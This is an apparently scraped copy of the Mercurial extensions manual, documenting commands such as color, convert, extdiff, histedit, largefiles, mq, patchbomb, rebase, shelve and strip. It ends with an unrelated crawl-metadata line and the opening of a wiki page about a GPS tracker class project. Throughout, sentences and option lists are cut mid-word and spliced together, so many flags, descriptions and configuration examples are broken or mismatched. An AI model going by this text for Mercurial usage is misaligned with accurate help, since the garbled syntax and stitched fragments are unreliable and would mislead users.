The color extension colorizes output from several Mercurial commands. For example, the diff command shows additions in green and deletions in red, while the status command shows modified files in magenta. Many other commands have analogous colors. It is possible to customize these colors.
Effects
Other effects in addition to color, like bold and underlined text, are also available. By default, the terminfo database is used to find the terminal codes used to change color and effect. If terminfo is not available, then effects are rendered with the ECMA−48 SGR control function (aka ANSI escape codes).
The available effects in terminfo mode are 'blink', 'bold', 'dim', 'inverse', 'invisible', 'italic', 'standout', and 'underline'; in ECMA−48 mode, the options are 'bold', 'inverse', 'italic', and 'underline'. How each is rendered depends on the terminal emulator. Some may not be available for a given terminal type, and will be silently ignored. −−color−color xterm's default color cube. These defined colors may then be used as any of the pre−defined eight, including appending '_background' to set the background to that color.
Modes.
Note that on some systems, terminfo mode may cause problems when using color with the pager extension and less −R. less with the −R option will only display ECMA−48 color codes, and terminfo mode may sometimes emit codes that less doesn't understand. You can work around this by either using ansi mode (or auto mode), or by using less −r (which will pass through all terminal control codes, not just color control codes).
On some systems (such as MSYS in Windows), the terminal may support a different color mode than the pager (activated via the "pager" extension). It is possible to define separate modes depending on whether the pager is active:
[color]
mode = auto
pagermode = ansi
If pagermode is not defined, the mode will be used.
Commands
convert
import revisions from foreign VCS repositories into Mercurial −hg appended. If the destination repository doesn't exist, it will be created.
By default, all sources except Mercurial will use −−branchsort. Mercurial uses −−sourcesort to preserve original revision numbers order. Sort modes have the following effects:
−−branchsort
convert from parent to child revision when possible, which means branches are usually converted one after the other. It generates more compact repositories.
−−datesort
sort revisions by date. Converted repositories have good−looking changelogs but are often an order of magnitude larger than the same ones generated by −−branchsort.
−−sourcesort
try to preserve source revisions order, only supported by Mercurial sources.
−−closes−or−dir
exclude path/to/file−or−dir.
−−full−separated−1.0" into "trunk", then you should specify the revision on "trunk" as the first parent and the one on the "release−1 −−config:.
CVS Source
CVS source will use a sandbox (i.e. a checked− −−config: ([− ([−−place, or add or delete them.
hooks.cvschangesets
Specify a Python function to be called after the changesets are calculated from the CVS log. The function is passed a list with the changeset entries, and can modify the changesets in−place, −−config:
convert.svn.branches
specify the directory containing branches. The default is branches.
convert.svn.tags
specify the directory containing tags. The default is tags.
convert.svn.trunk
specify the name of the trunk branch. The default is trunk. −−config:.remoteprefix
remote refs are converted as bookmarks with convert.git.remoteprefix as a prefix followed by a /. The default is 'remote'. ...−hg.
The following options can be set with −−config:.
All Destinations
All destination types accept the following options:
convert.skiptags
does not convert tags from the source repo to the target repo. The default is False.
Options:
−−authors <FILE>
username mapping filename (DEPRECATED, use −−authormap instead)
−s,−−source−type <TYPE>
source repository type
−d,−−dest−type <TYPE>
destination repository type
import up to source revision REV
−A,−−authormap <FILE>
remap usernames using this file
−−filemap <FILE>
remap file names using contents of file
−−full
apply filemap changes by converting all files again
−−splicemap <FILE>
splice synthesized history into place
−−branchmap <FILE>
change branch names while converting
−−branchsort
try to sort changesets by branches
try to sort changesets by date
preserve source changesets order−is in the repository.
Example versioned .hgeol file:
[patterns]
**.py = native
**.vcproj = CRLF
**.txt = native
Makefile = LF
**.jpg = BIN
[repository]
native = LF−consistent −trailing−new−option arguments: paths to directories containing snapshots of files to compare.
The extdiff extension also allows you to configure new diff commands, so you do not need to type hg extdiff −p kdiff3 always.
[extdiff]
# add new command that runs GNU diff(1) in 'context diff' mode
cdiff = gdiff −Nprc5
## or the old way:
#cmd.cdiff = gdiff
#opts.cdiff = −Nprc5
# add new command called meld, runs meld (no need to name twice). If
# the meld executable is not available, the meld tool in [merge−tools]
# will be used, if available
meld =
# add new command called vimdiff, runs gvimdiff with DirDiff plugin
# (see) Non
# English user, be sure to put "let g:DirDiffDynamicDiffText = 1" in
# your .vimrc
vimdiff = gvim −f "+next" \
"+execute 'DirDiff' fnameescape(argv(0)) fnameescape(argv(1))"
Tool arguments can include variables that are expanded at runtime:
$parent1, $plabel1 − filename, descriptive label of first parent
$child, $clabel − filename, descriptive label of child revision
$parent2, $plabel2 − filename, descriptive label of second parent
$root − repository root
$parent is an alias for $parent1.
The extdiff extension will look in your [diff−tools] and [merge−tools] sections for diff tool arguments, when none are specified in [extdiff].
[extdiff]
kdiff3 =
[diff−tools]
kdiff3.diffargs=−−L1 '$plabel1' −−L2 '$clabel' $parent $child
You can use −I/−X and list of file or directory names like normal hg diff command. The extdiff extension makes snapshots of only needed files, so running the external diff program will actually be pretty fast (at least faster than having to compare the entire tree).
Commands
extdiff
use external program to diff repository (or selected files):
hg extdiff [OPT]... [FILE]...
Show differences between revisions for the specified files, using an external program. The default program used is diff, with default options "−Npru".
To select a different program, use the −p/−−program option. The program will be passed the names of two directories to compare. To pass additional options to the program, use −o/−−option. These will be passed before the names of the directories to compare.
Options:
−p,−−program <CMD>
comparison program to run
−o,−−option <OPT[+]>
pass option to comparison program −−switch−parent.
a specific revision you would like to pull
−−force−editor
edit commit message (DEPRECATED)
switch parents when merging.
Options:
−l, −−local
make the signature local
sign even if the sigfile is modified
do not commit the sigfile after signing
−k,−−key <ID>
the key id to sign with
sigs
list signed changesets:
hg sigs
list signed changesets
graphlog
command to view revision graphs from a shell (DEPRECATED)
The functionality of this extension has been include in core Mercurial since version 2.3.
This extension adds a −−graph}−− {diffstat}
# Style to use (optional)
#style = foo
# The URL of the CIA notification service (optional)
# You can use mailto: URLs to send by email, e.g.
# mailto:cia AT cia DOT [−l LIMIT] [REVRANGE]
start interactive history viewer
Options:
−l,−−limit <NUM>−04−27 18:04 −0500 durin42
| Add delta
|
o 2 030b686bedc4 2009−04−27 18:04 −0500 durin42
| Add gamma
|
o 1 c561b4e977df 2009−04−27 18:04 −0500 durin42
| Add beta
|
o 0 d8d2fcd0e319 2009−04−27 18:04 −0500 −−keep −−continue −−continue`. −−abort to abandon the new changes you have made and return to the state before you attempted to edit your history.
If we clone the histedit−ed example repository above and add four more changes, such that we have the following history:
@ 6[tip] 038383181893 2009−04−27 18:04 −0500 stefan
| Add theta
|
o 5 140988835471 2009−04−27 18:04 −0500 stefan
| Add eta
|
o 4 122930637314 2009−04−27 18:04 −0500 stefan
| Add zeta
|
o 3 836302820282 2009−04−27 18:04 −0500 stefan
| Add epsilon
|
o 2
If you run hg histedit −−outgoing on the clone then it is the same as running hg histedit 836302820282. If you need plan to push to a repository that Mercurial does not detect to be related to the source repo, you can add a −−force option.
Histedit rule lines are truncated to 80 characters by default. You can customise this behaviour by setting a different length in your configuration file:
[histedit]
linelen = 120 # truncate rule lines at 120 characters
Commands
histedit
interactively edit changeset history:
hg histedit ANCESTOR | −−outgoing [URL]
This command edits changesets between ANCESTOR and the parent of the working directory.
With −−outgoing, this edits changesets not found in the destination repository. If URL of the destination is omitted, the 'default−push' (or 'default') path will be used.
For safety, this command is aborted, also if there are ambiguous outgoing revisions which may confuse users: for example, there are multiple branches containing outgoing revisions.
Use "min(outgoing() and ::.)" or similar revset specification instead of −−outgoing to specify edit target revision exactly in such ambiguous situation. See hg help revsets for detail about selecting revisions.
Returns 0 on success, 1 if user intervention is required (not only for intentional "edit" command, but also for resolving unexpected conflicts).
Options:
−−commands <FILE>
read history edits from the specified file
continue an edit already in progress
−−edit−plan
edit remaining actions list
−k, −−keep
don't strip old nodes after edit is complete
−−abort
abort an edit in progress
−o, −−outgoing
changesets not found in destination
force outgoing even for unrelated repositories
first revision to be edited
keyword
expand keywords in tracked files
This extension expands RCS/CVS−like or self−customized − over cvs−like default keywordmaps
svn = True−09−18 15:13:13Z"
svnisodate
"2006−09−18 08:13:13 −700 (Mon, 18 Sep 2006)"
The default template mappings (view with hg kwdemo −d)
print [keywordmaps] configuration and an expansion example:
hg kwdemo [−d] [−f RCFILE] [TEMPLATEMAP]...
Show current, custom, or default keyword template maps and their expansions.
Extend the current configuration by specifying maps as arguments and using −f/−−rcfile to source an external hgrc file.
Use −d/−−default to disable current configuration.
See hg help templates for information on templates and filters.
Options:
−d, −−default
show default keyword template maps
−f,−−rcfile <FILE>
read maps from rcfile
kwexpand
expand keywords in the working directory:
hg kwexpand [OPTION]... [FILE]...
Run after (re)enabling keyword expansion.
kwexpand refuses to run if given files contain local changes. −A/−−all and −v/−−verbose the codes used to show the status of files are:
K = keyword expansion candidate
k = keyword expansion candidate (not tracked)
I = ignored
i = ignored (not tracked)
show keyword status flags of all files
−i, −−ignore
show files excluded from expansion
only show unknown (not tracked) files
kwshrink
revert expanded keywords in the working directory:
hg kwshrink [OPTION]... [FILE]...
Must be run before changing/disabling active keywords.
kwshrink refuses to run if given files contain local changes.−server−1 hash plus newline) and are tracked by Mercurial. Largefile revisions are identified by the SHA−1 −−large to your hg add command. For example:
$ dd if=/dev/urandom of=randomdata count=2000
$ hg add −−large randomdata
$ hg commit −m −−update, which will update your working copy to the latest pulled revision (and thereby downloading any new largefiles).
If you want to pull largefiles you don't need for update yet, then you can use pull with the −−lfrev option or the hg lfpull command.
If you know you are pulling from a non−default location and want to download all the largefiles that correspond to the new changesets at the same time, then you can pull with −−lfrev "pulled()".
If you just want to ensure that you will have the largefiles needed to merge or rebase with new heads that you are pulling, then you can pull with −−lfrev "head(pulled())" flag to pre−empt−only operation.
If you already have large files tracked by Mercurial without the largefiles extension, you will need to convert your repository in order to benefit from largefiles. This is done with the hg lfconvert command:
$ hg lfconvert −−size −−lfsize option to the add command (also in megabytes):
[largefiles]
minsize = 2
$ hg add −−lf −−large flag passed to the hg add command. −−size or in configuration as largefiles.size.
After running this command you will need to make sure that largefiles is enabled anywhere you intend to push the new repository.
Use −−to−normal to convert largefiles back to normal files; after this, the DEST repository can be used without largefiles at all.
Options:
−s,−−size <SIZE>
minimum size (MB) for files to be converted as largefiles
−−to−normal
convert from a largefiles repo to a normal repo
lfpull
pull largefiles for the specified revisions from the specified source:
hg lfpull −r REV... [−e CMD] [−−remotecmd CMD] [SOURCE]
Pull largefiles that are referenced from local changesets but missing locally, pulling from a remote repository to the local cache.
pull largefiles for all branch heads:
hg lfpull −r "head() and not closed()"
pull largefiles on the default branch:
hg lfpull −r "branch(default)"
Options:
−r,−−rev <VALUE[+]>
pull largefiles for these revisions
mq
manage a stack of patches
This extension lets you work with a stack of patches in a Mercurial repository. It manages two stacks of patches − −f/−−force is used, the changes are discarded. Setting:
[mq]
keepchanges = True
make them behave as if −−keep−changes were passed, and non−conflicting local changes will be tolerated and preserved. If incompatible options such as −f/−−force or −−exact are passed, this setting is ignored.
This extension used to provide a strip command. This command now lives in the strip extension.
Commands
qapplied
print the patches already applied:
hg qapplied [−1] [−s] [PATCH]
Options:
−1, −−last
show only the preceding applied patch
−s, −−summary
print first line of patch header −p <url> to change.
The patch directory must be a nested Mercurial repository, as would be created by hg init −−mq.
Return 0 on success.
Options:
do not update the new working directories
−p,−−patches <REPO>
location of source patch repository
qcommit
commit changes in the queue repository (DEPRECATED):
hg qcommit [OPTION]... [FILE]...
This command is deprecated; use hg commit −−mq instead.
aliases: qci
qdelete
remove patches from queue:
hg qdelete [−k] [PATCH]...
The patches must not be applied, and at least one patch is required. Exact patch identifiers must be given. With −k/−−keep, the patch files are preserved in the patch directory.
To stop managing a patch and move it into permanent history, use the hg qfinish command.
Options:
−k, −−keep
keep patch file
stop managing a revision (DEPRECATED)
aliases: qremove qrm.
Options:
−a, −−text
qfinish
move applied patches into repository history:
hg qfinish [−a] [REV]...
Finishes the specified revisions (corresponding to applied patches) by moving them out of mq control into regular repository history.
Accepts a revision range or the −a/−−applied option. If −−applied.
Options:
−a, −−applied
finish all applied changesets
qfold
fold the named patches into the current patch:
hg qfold [−e] [−k] [−m TEXT] [−l FILE] PATCH...
Patches must not yet be applied. Each patch will be successively applied to the current patch in the order given. If all the patches apply successfully, the current patch will be refreshed with the new cumulative patch, and the folded patches will be deleted. With −k/−−keep, the folded patch files will not be removed afterwards.
The header for each folded patch will be concatenated with the current patch header, separated by a line of * * *.
Options:
−e, −−edit
keep folded patch files
qgoto
push or pop patches until named patch is at top of stack:
hg qgoto [OPTION]... PATCH
Options:
−−keep−changes
tolerate non−conflicting local changes
overwrite any local changes
−−no−backup
qguard
set or print guards for a patch:
hg qguard [−l] [−n] [PATCH] [−− [+GUARD]... [−GUARD]...]
Guards control whether a patch can be pushed. A patch with no guards is always pushed. A patch with a positive guard ("+foo") is pushed only if the hg qselect command has activated it. A patch with a negative guard ("−foo") is never pushed if the hg qselect command has activated it.
With no arguments, print the currently active guards. With arguments, set guards for the named patch.
Specifying negative guards now requires '−−'.
To set guards on another patch:
hg qguard other.patch −− +2.6.17 −stable
Options:
−l, −−list
list all patches and guards
−n, −−none
drop all guards
qheader
print the header of the topmost or specified patch:
hg qheader [PATCH]
qimport
import a patch or existing changeset:
hg qimport [−e] [−n NAME] [−f] [−g] [−P] [−r REV]... [FILE]...
The patch is inserted into the series after the last applied patch. If no patches have been applied, qimport prepends the patch to the series.
The patch will have the same name as its source file unless you give it a new one with −n/−−name.
You can register an existing patch inside the patch directory with the −e/−−existing flag.
With −f/−−force, an existing patch of the same name will be overwritten.
An existing changeset may be placed under mq control with −r/−−rev (e.g. qimport −−rev . −n patch will place the current revision under mq control). With −g/−−git, patches imported with −−rev will use the git diff format. See the diffs help topic for information on why this is important for preserving rename/copy information and permission changes. Use hg qfinish to remove changesets from mq control.
To import a patch from standard input, pass − as the patch file. When importing from standard input, a patch name must be specified using the −−name flag.
To import an existing patch while renaming it:
hg qimport −e existing−patch −n new−name
Returns 0 if import succeeded.
Options:
−e, −−existing
import file in patch directory
name of patch file
overwrite existing files
place existing revisions under mq control
−P, −−push
qpush after importing
qinit
init a new queue repository (DEPRECATED):
hg qinit [−c]
The queue repository is unversioned by default. If −c/−−create−repo is specified, qinit will create a separate nested repository for patches (qinit −c may also be run later to convert an unversioned patch repository into a versioned one). You can use qcommit to commit changes to this queue repository.
This command is deprecated. Without −c, it's implied by other relevant commands. With −c, use hg init −−mq instead.
Options:
−c, −−create−repo
create queue repository
qnew
create a new patch:
hg qnew [−e] [−m TEXT] [−l FILE] PATCH [FILE]...
qnew creates a new patch on top of the currently−applied patch (if any). The patch will be initialized with any outstanding changes in the working directory. You may also use −I/−−include, −X/−−exclude, and/or a list of files after the patch name to add only changes to matching files to the new patch, leaving the rest as uncommitted modifications.
−u/−−user and −d/−−date can be used to set the (given) user and date, respectively. −U/−−currentuser and −D/−−currentdate set user to current user and date to current date.
−e/−−edit, −m/−−message or −l/−−logfile set the patch header as well as the commit message. If none is specified, the header is empty and the commit message is '[mq]: PATCH'.
Use the −g/−−git option to keep the patch in the git extended diff format. Read the diffs help topic for more information on why this is important for preserving permission changes and copy/rename information.
Returns 0 on successful creation of a new patch.
import uncommitted changes (DEPRECATED)
add "From: <current user>" to patch
add "From: <USER>" to patch
add "Date: <current date>" to patch
add "Date: <DATE>" to patch
qnext
print the name of the next pushable patch:
hg qnext [−s]
Options:
−s, −−summary
qpop
pop the current patch off the stack:
hg qpop [−a] [−f] [PATCH | INDEX]
Without argument, pops off the top of the patch stack. If given a patch name, keeps popping off patches until the named patch is at the top of the stack.
By default, abort if the working directory contains uncommitted changes. With −−keep−changes, abort only if the uncommitted files overlap with patched files. With −f/−−force, backup and discard changes made to such files.
pop all patches
queue name to pop (DEPRECATED)
−−keep−changes
forget any local changes to patched files
qprev
print the name of the preceding applied patch:
hg qprev [−s]
qpush
push the next patch onto the stack:
hg qpush [−f] [−l] [−a] [−−move] [PATCH | INDEX]
By default, abort if the working directory contains uncommitted changes. With −−keep−changes, abort only if the uncommitted files overlap with patched files. With −f/−−force, backup and patch over uncommitted changes.
apply on top of local changes
−e, −−exact
apply the target patch to its recorded parent
list patch name in commit text
apply all patches
−m, −−merge
merge from another queue (DEPRECATED)
merge queue name (DEPRECATED)
−−move
reorder patch series and apply only the patch
qqueue
manage multiple patch queues:
hg qqueue [OPTION] [QUEUE]
Supports switching between different patch queues, as well as creating new patch queues and deleting existing ones.
Omitting a queue name or specifying −l/−−list will show you the registered queues − by default the "normal" patches queue is registered. The currently active queue will be marked with "(active)". Specifying −−active will print only the name of the active queue.
To create a new queue, use −c/−−create. The queue is automatically made active, except in the case where there are applied patches from the currently active queue in the repository. Then the queue will only be created and switching will fail.
To delete an existing queue, use −−delete. You cannot delete the currently active queue.
list all available queues
−−active
print name of active queue
−c, −−create
create new queue
−−rename
rename active queue
−−delete
delete reference to queue
−−purge
delete queue, and remove patch dir
qrefresh
update the current patch:
hg qrefresh [−I] [−X] [−e] [−m TEXT] [−l FILE] [−s] [FILE]...
If any file patterns are provided, the refreshed patch will contain only the modifications that match those patterns; the remaining modifications will remain in the working directory.
If −s/−−short is specified, files currently included in the patch will be refreshed just like matched files and remain in the patch.
If −e/−−edit is specified, Mercurial will start your configured editor for you to enter a message. In case qrefresh fails, you will find a backup of your message in .hg/last−message.txt.
hg add/remove/copy/rename work as usual, though you might want to use git−style patches (−g/−−git or [diff] git=1) to track copies and renames. See the diffs help topic for more information on the git diff format.
−s, −−short
refresh only files already in the patch and specified files
add/update author field in patch with current user
add/update author field in patch with given user
add/update date field in patch with current date
add/update date field in patch with given date
qrename
rename a patch:
hg qrename PATCH1 [PATCH2]
With one argument, renames the current patch to PATCH1. With two arguments, renames PATCH1 to PATCH2.
aliases: qmv
qrestore
restore the queue state saved by a revision (DEPRECATED):
hg qrestore [−d] [−u] REV
This command is deprecated, use hg rebase instead.
Options:
−d, −−delete
delete save entry
−u, −−update
update queue working directory
qsave
save current queue state (DEPRECATED):
hg qsave [−m TEXT] [−l FILE] [−c] [−n NAME] [−e] [−f]
Options:
−c, −−copy
copy patch directory
copy directory name
−e, −−empty
clear queue status file
force copy −− −stable −n/−−none to deactivate guards (no other arguments needed). When no guards are active, patches with positive guards are skipped and patches with negative guards are pushed.
qselect can change the guards on applied patches. It does not pop guarded patches by default. Use −−pop to pop back to the last applied patch that is not guarded. Use −−reapply (which implies −−pop) to push back to the current patch afterwards, but skip guarded patches.
Use −s/−−series to print a list of all guards in the series file (no other arguments needed). Use −v for more information.
Options:
−n, −−none
disable all guards
−s, −−series
list all guards in series file
−−pop
pop to before first guarded applied patch
−−reapply
pop, then reapply patches
qseries
print the entire series file:
hg qseries [−ms]
Options:
−m, −−missing
print patches not in series
qtop
print the name of the current patch:
hg qtop [−s]
qunapplied
print the patches not yet applied:
hg qunapplied [−1] [−s] [PATCH]
Options:
−1, −−first
show only the first patch−separated list of repo patterns
user@host = pattern
[reposubs]
# key is repo pattern, value is a comma−separated list of subscriber emails
pattern = user@host
A pattern is a glob matching the absolute path to a repository, optionally combined with a revset expression. A revset expression, if present, is separated from the glob by a hash. Example:
[reposubs]
*/widgets#branch(release) = qa−team AT example DOT com
This sends to qa−team AT example DOT−separated list of change sources. Notifications are activated only when a changeset's source is in this list. Sources may be:
serve
changesets received via http or ssh
changesets received via hg pull
changesets received via hg unbundle −1 address to use if none can be found in the generated email content.
Root repository URL to combine with repository paths when making references. See also notify.strip.
pager
browse command output with an external pager
To set the pager that should be used, set the application variable:
[pager]
pager = less −FR.
Lastly, you can enable and disable paging for individual commands with the attend−<command> option. This setting takes precedence over existing attend and ignore options and defaults:
[pager]
attend−cat = false
To ignore global commands like hg version or hg help, you have to specify them in your user configuration file.
The −−p−Reply−To and References headers, so they will show up as a sequence in threaded mail and news readers, and in mail archives.
To configure other defaults, add a section like this to your configuration file:
from = My Name <my@email>
to = recipient1, recipient2, ...
cc = cc1, cc2, ...
bcc = bcc1, bcc2, ...
reply−to =.
You can control the default inclusion of an introduction message with the patchbomb.intro configuration option. The configuration is always overwritten by command line flags like −−intro and −−desc:
[patchbomb]
intro=auto # include introduction message if more than 1 patch (default)
intro=never # never include an introduction message
intro=always # always include an introduction message
You can set patchbomb to always ask for confirmation by setting patchbomb.confirm to true.
Commands −d/−−diffstat option, if the diffstat program is installed, the result of running diffstat on the patch is inserted.
Finally, the patch itself, as generated by hg export.
With the −d/−−diffstat or −−confirm options, you will be presented with a final summary of all messages and asked for confirmation before the messages are sent.
By default the patch is included as text in the email body for easy reviewing. Using the −a/−−attach option will instead create an attachment for the patch. With −i/−−inline an inline attachment will be created. You can include a patch both as text in the email body and as a regular or an inline attachment by combining the −a/−−attach or −i/−−inline with the −−body option.
With −o/−−outgoing, emails will be generated for patches not found in the destination repository (or only those which are ancestors of the specified revisions if any are provided)
With −b/−−bundle, changesets are selected as for −−outgoing, but a single email containing a binary Mercurial bundle as an attachment will be sent.
With −m/−−mbox, instead of previewing each patchbomb message in a pager or sending the messages directly, it will create a UNIX mailbox file with the patch emails. This mailbox file can be previewed with any mail user agent which supports UNIX mbox files.
With −n/−−test,−email.txt.
The default behavior of this command can be customized through configuration. (See hg help patchbomb for details)
hg email −r 3000 # send patch 3000 only
hg email −r 3000 −r 3001 # send patches 3000 and 3001
hg email −r 3000:3005 # send patches 3000 through 3005
hg email 3000 # send patch 3000 (deprecated)
hg email −o # send all patches not in default
hg email −o DEST # send all patches not in DEST
hg email −o −r 3000 # send all ancestors of 3000 not in default
hg email −o −r 3000 DEST # send all ancestors of 3000 not in DEST
hg email −b # send bundle of all patches not in default
hg email −b DEST # send bundle of all patches not in DEST
hg email −b −r 3000 # bundle of all ancestors of 3000 not in default
hg email −b −r 3000 DEST # bundle of all ancestors of 3000 not in DEST
hg email −o −m mbox && # generate an mbox file...
mutt −R −f mbox # ... and view it with mutt
hg email −o −m mbox && # generate an mbox file ...
formail −s sendmail \ # ... and use formail to send from the mbox
−bm −t < mbox # ... using sendmail
Before using this command, you will need to enable email in your hgrc. See the [email] section in hgrc(5) for details.
Options:
−g, −−git
−−plain
omit hg patch header
send changes not found in the target repository
−b, −−bundle
send changes not in target as a binary bundle
−−bundlename <NAME>
name of the bundle attachment file (default: bundle)
a revision to send
−−force
run even when remote repository is unrelated (with −b/−−bundle)
a base changeset to specify instead of a destination (with −b/−−bundle)
−−intro
send an introduction email for a single patch
−−body
send patches as inline message text (default)
−a, −−attach
send patches as attachments
−i, −−inline
send patches as inline attachments
−−bcc <VALUE[+]>
−c,−−cc <VALUE[+]>
−−confirm
ask for confirmation before sending
−d, −−diffstat
add diffstat output to messages
−−date <VALUE>
use the given date as the sending date
−−desc <VALUE>
use the given file as the series description
−f,−−from <VALUE>
−n, −−test
print messages that would be sent
−m,−−mbox <VALUE>
write messages to mbox file instead of sending them
−−reply−to <VALUE[+]>
−s,−−subject <VALUE>
subject of first message (intro or single patch)
−−in−reply−to <VALUE>
message identifier to reply to
−−flag <VALUE[+]>
flags to add in subject prefixes
−t,−−to <VALUE[+]>
progress
show progress bars for some actions (DEPRECATED)
This extension has been merged into core, you can remove it from your config. See hg help config.progress for configuration options.
purge
command to delete untracked files from the working directory
Commands
purge
removes files not tracked by Mercurial:
hg purge [OPTION]... [DIR]...
Delete files not known to Mercurial. This is useful to test local and uncommitted changes in an otherwise−clean −−all is specified)
New files added to the repository (with hg add)
The −−files and −−dirs −−print option.
Options:
−a, −−abort−on−err
abort if an error occurs
purge ignored files too
−−dirs
purge empty directories
−−files
purge files
−p, −−print
print filenames instead of deleting them
end filenames with NUL, for use with xargs (implies −p/−−print)
aliases: clean
rebase
command to move sets of revisions to a different ancestor
This extension lets you rebase changesets in an existing Mercurial repository.
For more information:
Commands
rebase
move changeset (and descendants) to a different branch:
hg rebase [−s REV | −b REV] [−d (−d/−−dest), rebase uses the current branch tip (−s/−−source), rebase will rebase that changeset and all of its descendants onto dest. If you specify base (−b/−−base), rebase will select ancestors of base back to but not including the common ancestor with dest. Thus, −b is less precise but more convenient than −s: you can specify any changeset in the source branch, and rebase will select the whole branch. If you specify neither −s nor −b, rebase uses the parent of the working directory as the base.
For advanced usage, a third way is available through the −−rev −−keep branch tip of a named branch with two heads. You need to explicitly specify source and/or destination (or update to the other head, if it's the head of the intended source branch).
If a rebase is interrupted to manually resolve a merge, it can be continued with −−continue/−c or aborted with −−abort/−a.
move "local changes" (current commit back to branching point) to the current branch tip after a pull:
hg rebase
move a single changeset to the stable branch:
hg rebase −r 5f493448 −d stable
splice a commit and all its descendants onto another part of history:
hg rebase −−source c0c3 −−dest 4cf9
rebase everything on a branch marked by a bookmark onto the default branch:
hg rebase −−base myfeature −−dest default
collapse a sequence of changes into a single commit:
hg rebase −−collapse −r 1520:1525 −d .
move a named branch while preserving its name:
hg rebase −r "branch(featureX)" −d 1.3 −−keepbranches
Returns 0 on success, 1 if nothing to rebase or there are unresolved conflicts.
Options:
−s,−−source <REV>
rebase the specified changeset and descendants
−b,−−base <REV>
rebase everything from branching point of specified changeset
rebase these revisions
−d,−−dest <REV>
rebase onto the specified changeset
−−collapse
collapse the rebased changesets
use text as collapse commit message
read collapse commit message from file
keep original changesets
−−keepbranches
keep original branch names
−D, −−detach
(DEPRECATED)
continue an interrupted rebase
−a, −−abort
abort an interrupted rebase
record
commands to interactively select changes for commit/qrefresh
Commands.
You will be prompted for whether to record changes to each modified file, and for files with multiple changes, for each change to use. For each query, the following responses are possible:
y − record this change
n − skip this change
e − edit this change manually
s − skip remaining changes to this file
f − record remaining changes to this file
d − done, skip remaining changes and files
a − record all changes to all remaining files
q − quit, recording no changes
? − display help
This command is not available when committing a merge.
relink
recreates hardlinks between repository clones
Commands −−rev−rel AT bitbucket DOT org/
gcode = https://{1}.googlecode.com/hg/
kiln = https://{1}.kilnhg.com/Repo/
You can override a predefined scheme by defining a new scheme with the same name.
share a common history between several working directories."
Commands
create a new shared repository:
hg share [−U] [−B] SOURCE [DEST]
Initialize a new repository and working directory that shares its history (and optionally bookmarks) with another repository..
do not create a working directory
also share bookmarks
unshare
convert a shared repository to a normal one:
hg unshare
Copy the store data to the repo and remove the sharedpath data.
shelve
save and restore changes to the working directory
The "hg shelve" command saves changes made to the working directory and reverts those changes, resetting the working directory to a clean state.
Later on, the "hg unshelve" command restores the changes saved by "hg shelve". Changes can be restored even after updating to a different parent, in which case Mercurial's merge machinery will resolve any conflicts if necessary.
You can have more than one shelved change outstanding at a time; each shelved change has a distinct name. For details, see the help for "hg shelve".
Commands−clean files. If specific files or directories are named, only changes to those files are shelved.
Each shelved change has a name that makes it easier to find later. The name of a shelved change defaults to being based on the active bookmark, or if there is no active bookmark, the current named branch. To specify a different name, use −−name.
To see a list of existing shelved changes, use the −−list option. For each shelved change, this will print its name, age, and description; use −−patch or −−stat for more details.
To delete specific shelved changes, use −−delete. To delete all shelved changes, use −−cleanup.
mark new/missing files as added/removed before shelving
−−cleanup
delete all shelved changes
−−date <DATE>
shelve with the specified commit date
delete the named shelved change(s)
list current shelves
use text as shelve message
use the given name for the shelved commit
interactive mode, only works while creating a shelve
unshelve
restore a shelved change to the working directory:
hg unshel−backup).
Since you can restore a shelved change on top of an arbitrary commit, it is possible that unshelving will result in a conflict between your changes and the commits you are unshelving onto. If this occurs, you must resolve the conflict, then use −−continue to complete the unshelve operation. (The bundle will not be moved until you successfully complete the unshelve.)
(Alternatively, you can use −−abort to abandon an unshelve that causes a conflict. This reverts the unshelved changes, and leaves the bundle in place.).
Options:
−a, −−abort
abort an incomplete unshelve operation
continue an incomplete unshelve operation
−−keep
keep shelve after unshelving
set date for temporary commits (DEPRECATED)
strip
strip changesets and their descendants from history
This extension allows you to strip changesets and all their descendants from the repository. See the command help for details.
Commands
strip
strip changesets and all their descendants from the repository:
hg strip [−k] [−f] [−n] [−B bookmark] [−r] REV...
The strip command removes the specified changesets and all their descendants. If the working directory has uncommitted changes, the operation is aborted unless the −−force−backup as a bundle (see hg help bundle and hg help unbundle). They can be restored by running hg unbundle .hg/strip−backup/BUNDLE, where BUNDLE is the bundle file created by the strip. Note that the local revision numbers will in general be different after the restore.
Use the −−no−backup option to discard the backup bundle once the operation completes.
Strip is not a history−rewriting operation and can be used on changesets in the public phase. But if the stripped changesets have been pushed to a remote repository you will likely pull them again.
strip specified revision (optional, can specify revisions without this option)
force removal of changesets, discard uncommitted changes (no backup)
no backups
−−nobackup
no backups (DEPRECATED)
−n
ignored (DEPRECATED)
do not modify working directory during strip
−B,−−bookmark <VALUE>
remove revs only reachable from given bookmark
transplant changesets from another branch:
hg transplant [−s REPO] [−b BRANCH [−a]] [−p REV] [−m − it will use merges and will usually give a better result. Use the rebase extension if the changesets are unpublished and you want to move them instead of copying them.
(transplanted from CHANGESETHASH)
You can rewrite the changelog message with the −−filter option. Its argument will be invoked with the current changelog message as $1 and the patch as $2.
−−source/−s specifies another repository to use for selecting changesets, just as if it temporarily had been pulled. If −−branch/−b is specified, these revisions will be used as heads when deciding which changesets to transplant, just as if only these revisions had been pulled. If −−all/−a is specified, all the revisions up to the heads specified with −−branch will be transplanted.
transplant all changes up to REV on top of your current revision:
hg transplant −−branch REV −− −−parent.
If no merges or revisions are provided, hg transplant will start an interactive changeset browser.
If a changeset application fails, you can fix the merge by hand and then resume where you left off by calling hg transplant −−continue/−c.
Options:
−s,−−source <REPO>
transplant changesets from REPO
−b,−−branch <REV[+]>
use this source changeset as head
pull all changesets up to the −−branch revisions
−p,−−prune <REV[+]>
skip over REV
−m,−−merge <REV[+]>
merge at REV
parent to choose when transplanting merge
append transplant info to log message
continue last transplant session after fixing conflicts
−−filter <CMD>−insensitive−8−enabled−enabled repositories by running hg paths:
$ hg paths
zc−test =
−8.
.hg/last−message AT selenic DOT com>
Main Web Site:
Source code repository:
Mailing list:
Copyright (C) 2005−2015 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version.
Matt Mackall <mpm AT selenic DOT com>
Organization: Mercurial | http://man.sourcentral.org/f23/1+hg | CC-MAIN-2017-43 | refinedweb | 18,018 | 61.26 |
Difference between revisions of "ECE497 Project GPS Tracker"
Revision as of 21:02,
Grading Template
I'm using the following template to grade. Each slot is 10 points. 0 = Missing, 5=OK, 10=Wow!
